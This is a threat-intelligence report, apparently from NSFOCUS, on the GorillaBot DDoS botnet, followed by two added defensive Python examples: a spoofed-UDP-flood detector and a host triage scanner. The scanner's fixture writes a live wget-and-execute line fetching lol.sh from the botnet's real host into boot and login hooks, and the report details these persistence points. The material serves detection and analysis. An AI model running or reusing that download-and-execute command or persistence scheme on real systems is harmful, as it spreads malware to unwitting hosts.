URL: https://nsfocusglobal.com/over-300000-gorillabot-the-new-king-of-ddos-attacks/
OVER 300,000! GORILLABOT: THE NEW KING OF DDOS ATTACKS
September 29, 2024 | NSFOCUS

OVERVIEW

In September 2024, the NSFOCUS Global Threat Hunting System observed a new botnet family, which calls itself Gorilla Botnet, entering an unusually active state. Between September 4 and September 27 it issued over 300,000 attack commands, an exceptionally high attack density. During this period Gorilla Botnet targeted more than 100 countries, with China and the U.S. hit hardest. Targets included universities, government websites, telecoms, banks, and the gaming and gambling sectors.

Gorilla Botnet is a modified version of the Mirai source code and supports multiple CPU architectures, including ARM, MIPS, x86_64, and x86. It adds a range of DDoS attack methods, uses encryption algorithms commonly employed by the KekSec group to hide key strings, and employs several techniques to keep long-term control over compromised IoT devices and cloud hosts, showing a high level of counter-detection awareness for an emerging botnet family.

IMPACT SCOPE

NSFOCUS Global Threat Hunting System data shows that Gorilla Botnet issued over 300,000 DDoS attack commands in September 2024, with a daily peak of over 20,000 commands. Commands were sent continuously around the clock, with a relatively even distribution across each 24-hour period.

Figure 1 Attack commands

Gorilla Botnet's attacks reached 113 countries and more than 20,000 individual targets. Geographically, China suffered the most severe attacks, accounting for 20% of the total, followed by the U.S. (19%), Canada (16%), and Germany (6%).

Figure 2 Victim distribution

Monitoring data further indicates that over the past month Gorilla Botnet launched multiple attacks against critical infrastructure, affecting over 40 organizations.
In terms of attack methods, Gorilla Botnet favors UDP Flood (41%), followed by ACK BYPASS Flood (24%) and VSE Flood (12%). Because the botnet has a limited number of bots, the connectionless UDP protocol is attractive: it allows arbitrary source IP spoofing, so a small bot population can still generate relatively high traffic volumes, which is why UDP flooding is favored. In terms of implementation, the attackers give their DDoS attacks many self-chosen names but still draw heavily on existing attack code.

Figure 3 Attack vectors

SAMPLE ANALYSIS

Core Functionality

This trojan is modified from the Mirai family and supports the ARM, MIPS, x86_64, and x86 architectures. Its online (check-in) packet and command parsing module reuse Mirai source code, but the sample leaves a signature message, "gorilla botnet is on the device ur not a cat go away", hence the name GorillaBot.

Figure 4 GorillaBot

GorillaBot has five built-in command and control (C&C) servers. On start-up it randomly selects one, connects and goes online using the same process as Mirai, then waits to receive commands.

Figure 5 C&C

Compared with the original Mirai it has significantly more DDoS attack methods, with attack vector IDs running up to 19, as listed in the table below.

Vector  Method
0       attack_udp_generic
1       attack_udp_vse
3       attack_tcp_syn
4       attack_tcp_ack
5       attack_tcp_stomp
6       attack_gre_ip
7       attack_gre_eth
9       attack_udp_plain
10      attack_tcp_bypass
11      attack_udp_bypass
12      attack_std
13      attack_udp_openvpn
14      attack_udp_rape
15      attack_wra
16      attack_tcp_ovh
17      attack_tcp_socket
18      attack_udp_discord
19      attack_udp_fivem

Encryption and Decryption Algorithms

GorillaBot also uses the encryption algorithms favored by the KekSec group to encrypt key strings. Together with the signatures left in the samples and the habit of naming the propagation script "lol.sh", this suggests that the group is either related to KekSec or is borrowing KekSec's tooling to conceal its true identity.
Figure 6 Encryption and decryption algorithms

Persistence and Counter-Honeypot

Unlike conventional Mirai variants, GorillaBot contains a function named "yarn_init" that integrates code to exploit the Hadoop YARN RPC unauthorized access vulnerability.

Figure 7 Vulnerability exploitation

Because Hadoop YARN is typically installed with administrator privileges, a successful exploit of this vulnerability hands the attacker correspondingly high privileges on the host.

For persistence, the GorillaBot trojan creates a service file named custom.service in /etc/systemd/system/, configured to run automatically at system start-up. The service's main job is to download a script named lol.sh from http://pen.gorillafirewall.su/ into /tmp/, make it executable, and run it.

Figure 8 Persistence

GorillaBot also appends commands to /etc/inittab, /etc/profile, and /boot/bootcmd so that lol.sh is downloaded and executed at init, on user login, and at boot respectively. It creates a script named mybinary in /etc/init.d/, set to run at system start-up, that likewise downloads and executes lol.sh. It also attempts to add a soft link to mybinary in /etc/rc.d/rc.local or /etc/rc.conf (if the link is not already present) so that it runs at start-up.

Figure 9 Persistence

From the string "/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot..." it can be inferred that the trojan also tries to detect honeypots, for example by checking whether the /proc filesystem exists on the compromised device before proceeding.
Figure 10 Honeypot identification

IOC (MD5)

276adc6a55f13a229a5ff482e49f3a0b
63cbfc2c626da269c67506636bb1ea30
7f134c477f307652bb884cafe98b0bf2
3a3be84df2435623132efd1cd9467b17
03a59780b4c5a3c990d0031c959bf7cc
5b37be51ee3d41c07d02795a853b8577
15f6a606ab74b66e1f7e4a01b4a6b2d7
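The attack-method breakdown in the Impact Scope section above notes that a small bot population can still produce heavy traffic with UDP because source addresses are forged at will. The flip side is that forged floods leave a measurable fingerprint in flow data: thousands of distinct sources, each sending roughly one packet, all aimed at one destination port. The detector below, added here as an example and not code from NSFOCUS or from the GorillaBot sample, applies that heuristic to flow records; the record layout, the thresholds and the constructed sample traffic are this example's own assumptions.

```python
"""Spot spoofed-source UDP floods in flow records.

Added example, not NSFOCUS or GorillaBot code.  The flow tuple layout,
the thresholds and the sample traffic below are assumptions made for the
example; the only input from the write-up is the observation that UDP
lets a small botnet forge arbitrary source addresses."""
from collections import defaultdict
import random

# Assumed flow record layout: (ts_seconds, proto, src_ip, dst_ip, dst_port, packets)


def udp_flood_alerts(flows, pps_threshold=1000, min_sources=100, max_pkts_per_source=4.0):
    """Aggregate flows into one-second buckets per (dst_ip, dst_port) and flag
    buckets that look like a spoofed UDP flood: a high packet rate, many
    distinct sources, and barely more than one packet per source.  Real UDP
    services (DNS, VPN) show a few sources with many packets each, so the
    packets-per-source ratio is what separates them from forged traffic."""
    buckets = defaultdict(lambda: {"packets": 0, "sources": set()})
    for ts, proto, src, dst, dport, pkts in flows:
        if proto != "udp":
            continue
        bucket = buckets[(int(ts), dst, dport)]
        bucket["packets"] += pkts
        bucket["sources"].add(src)

    alerts = []
    for (second, dst, dport), bucket in sorted(buckets.items()):
        n_src = len(bucket["sources"])
        per_src = bucket["packets"] / n_src
        if (bucket["packets"] >= pps_threshold
                and n_src >= min_sources
                and per_src <= max_pkts_per_source):
            alerts.append({
                "second": second, "dst": dst, "dport": dport,
                "pps": bucket["packets"], "sources": n_src,
                "pkts_per_source": round(per_src, 2),
            })
    return alerts


def constructed_flows(seed=1):
    """Constructed sample traffic: one spoofed UDP flood plus legitimate
    DNS and TCP traffic to the same host (documentation address ranges)."""
    rng = random.Random(seed)
    flows = []
    # 2000 single-packet UDP flows from forged sources to one target port.
    for _ in range(2000):
        src = ".".join(str(rng.randrange(1, 255)) for _ in range(4))
        flows.append((10.0, "udp", src, "203.0.113.10", 80, 1))
    # Three resolvers exchanging many packets each with the same host.
    for i in range(30):
        flows.append((10.0, "udp", f"198.51.100.{i % 3 + 1}", "203.0.113.10", 53, 50))
    # A TCP session on the same box; ignored by the UDP rule.
    flows.append((10.0, "tcp", "198.51.100.9", "203.0.113.10", 443, 400))
    return flows


if __name__ == "__main__":
    for alert in udp_flood_alerts(constructed_flows()):
        print(alert)
```

The DNS bucket in the sample carries 1,500 packets per second but only three sources, so it is not flagged; the flood bucket is flagged because almost every one of its packets arrives from a different address. Tune pps_threshold to the link being watched, and keep the packets-per-source check: it is the part that distinguishes forged traffic from a busy but legitimate UDP service.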
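To turn the Persistence section and the IOC list above into a host check, the script below walks the hook files the write-up names (custom.service, /etc/inittab, /etc/profile, /boot/bootcmd, /etc/init.d/mybinary, rc.local and rc.conf), looks for the lol.sh downloader and the mybinary link, and hashes the dropped files plus everything under /tmp against the MD5 list. It is an added example, not NSFOCUS tooling; the finding format, the constructed sample roots and the illustrative file contents are its own assumptions, and the root under scan is a parameter so it can be pointed at a mounted image instead of the live filesystem.

```python
"""Host triage for the GorillaBot persistence artifacts and IOC hashes.

Added example, not NSFOCUS or GorillaBot code.  The file paths, the
download host and the hashes come from the write-up; the scan logic, the
finding format and the sample roots are this example's own assumptions."""
import hashlib
import os
import re
import tempfile

# MD5 hashes from the IOC list above.
GORILLABOT_MD5S = {
    "276adc6a55f13a229a5ff482e49f3a0b", "63cbfc2c626da269c67506636bb1ea30",
    "7f134c477f307652bb884cafe98b0bf2", "3a3be84df2435623132efd1cd9467b17",
    "03a59780b4c5a3c990d0031c959bf7cc", "5b37be51ee3d41c07d02795a853b8577",
    "15f6a606ab74b66e1f7e4a01b4a6b2d7",
}
# Boot/login hooks the trojan writes or appends to (relative to the scanned root).
HOOK_FILES = ["etc/systemd/system/custom.service", "etc/inittab", "etc/profile",
              "boot/bootcmd", "etc/init.d/mybinary", "etc/rc.d/rc.local", "etc/rc.conf"]
# Files the trojan drops; these are hashed against the IOC list.
DROPPED_FILES = ["etc/systemd/system/custom.service", "etc/init.d/mybinary", "tmp/lol.sh"]
# Strings the write-up ties to the lol.sh downloader and the init.d script.
SUSPECT = re.compile(r"lol\.sh|gorillafirewall\.su|/etc/init\.d/mybinary")


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_host(root="/", iocs=GORILLABOT_MD5S):
    """Return (kind, path, detail) findings: 'hook' for a suspicious line in a
    boot/login hook, 'symlink' for a link pointing at mybinary, 'present' for a
    dropped file with an unknown hash, 'ioc_match' for a hash on the IOC list."""
    findings = []
    for rel in HOOK_FILES:
        path = os.path.join(root, rel)
        if os.path.islink(path):
            target = os.readlink(path)
            if "mybinary" in target:
                findings.append(("symlink", path, target))
            continue
        if not os.path.isfile(path):
            continue
        with open(path, errors="replace") as f:
            for n, line in enumerate(f, 1):
                if SUSPECT.search(line):
                    findings.append(("hook", path, f"line {n}: {line.strip()}"))
    dropped = {os.path.join(root, rel) for rel in DROPPED_FILES}
    candidates = set(dropped)
    for dirpath, _, names in os.walk(os.path.join(root, "tmp")):
        candidates.update(os.path.join(dirpath, n) for n in names)
    for path in sorted(candidates):
        if os.path.islink(path) or not os.path.isfile(path):
            continue
        digest = md5_of(path)
        if digest in iocs:
            findings.append(("ioc_match", path, digest))
        elif path in dropped:
            findings.append(("present", path, digest))
    return findings


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def build_sample_root():
    """Constructed infected root mirroring the write-up's description; the
    file contents are illustrative, not copied from a real sample."""
    root = tempfile.mkdtemp(prefix="gorilla-")
    fetch = ("wget http://pen.gorillafirewall.su/lol.sh -O /tmp/lol.sh && "
             "chmod +x /tmp/lol.sh && /tmp/lol.sh")
    _write(root, "etc/systemd/system/custom.service",
           f"[Unit]\nDescription=custom\n[Service]\nExecStart=/bin/sh -c '{fetch}'\n"
           "[Install]\nWantedBy=multi-user.target\n")
    _write(root, "etc/profile", "export PATH=/usr/bin:/bin\n" + fetch + "\n")
    _write(root, "etc/init.d/mybinary", "#!/bin/sh\n" + fetch + "\n")
    _write(root, "etc/rc.d/rc.local", "#!/bin/sh\n/etc/init.d/mybinary\n")
    os.symlink("/etc/init.d/mybinary", os.path.join(root, "etc/rc.conf"))
    _write(root, "tmp/lol.sh", "#!/bin/sh\necho stage-two placeholder\n")
    return root


def build_clean_root():
    """Constructed root with only a benign /etc/profile."""
    root = tempfile.mkdtemp(prefix="clean-")
    _write(root, "etc/profile", "export PATH=/usr/bin:/bin\n")
    return root


if __name__ == "__main__":
    for kind, path, detail in scan_host(build_sample_root()):
        print(f"{kind:9} {path} {detail}")
```

Run it against a mounted image with scan_host("/mnt/image") rather than on the live root of a suspected box. A /tmp with no lol.sh proves little, since the hooks re-fetch the script on every boot and login; the durable evidence is the hook files themselves, which is why the script reports any matching line in them even when no hash matches.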